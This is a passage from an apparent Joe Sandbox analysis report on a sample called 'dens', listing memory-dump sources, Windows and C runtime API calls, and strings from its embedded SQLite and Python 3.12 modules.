                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 3510742995-3727861699
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 0-3727861699
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000,00000001,00007FFDFAC0DA8A,?,?,?,00007FFDFAC0DE4B), ref: 00007FFDFAC0D949
                                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000,00000001,00007FFDFAC0DA8A,?,?,?,00007FFDFAC0DE4B), ref: 00007FFDFAC0D963
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDFAC0DA8A,?,?,?,00007FFDFAC0DE4B), ref: 00007FFDFAC0D9F7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: strncmp$memcpy
                                                                                                                                                                                                                                              • String ID: CRE$INS
                                                                                                                                                                                                                                              • API String ID: 2549481713-4116259516
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpymemmove
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 167125708-3727861699
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3AF
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3CE
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3F6
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B407
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B418
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF62C0F352C,?,00000000,00007FF62C0F3F1B), ref: 00007FF62C0F7F32
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PyErr_SetString.PYTHON312(?,?,?,?,?,00007FFDFAA51EBC), ref: 00007FFDFAA53C1F
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA51FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAA51FE8
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA51FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAA52006
                                                                                                                                                                                                                                              • PyErr_Format.PYTHON312 ref: 00007FFDFAA51F33
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Err_strncmp$FormatString
                                                                                                                                                                                                                                              • String ID: name too long$undefined character name '%s'
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaisememcmp
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 2159421160-3727861699
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAC08BBF), ref: 00007FFDFAC08889
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAC08BBF), ref: 00007FFDFAC0890B
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAC08BBF), ref: 00007FFDFAC089FD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                              • API String ID: 3510742995-2313493979
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C10CF4B), ref: 00007FF62C10D07C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C10CF4B), ref: 00007FF62C10D107
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                              • API String ID: 0-1505470444
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE
• API String ID: 3510742995-3459038510
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
• Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
Similarity
• API ID: strncmp
• String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
• API String ID: 1114863663-87138338
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: memcpy
• String ID: out of memory$string or blob too big
• API String ID: 3510742995-2410398255
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: memset
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
• API String ID: 2221118986-3727861699
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: memcpy
• String ID: (join-%u)$(subquery-%u)
• API String ID: 3510742995-2916047017
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: memmove
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
• API String ID: 2162964266-3727861699
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: memcpy
• String ID: $%!.15g$-
• API String ID: 3510742995-875264902
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID:
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
• API String ID: 0-3727861699
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: memset
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
• API String ID: 2221118986-3727861699
Memory Dump Source
• Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
Memory Dump Source
• Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
• Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
• Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067701884.00007FFDFA2C1000.00000020.00000001.01000000.00000026.sdmp, Offset: 00007FFDFA2C0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfa2c0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
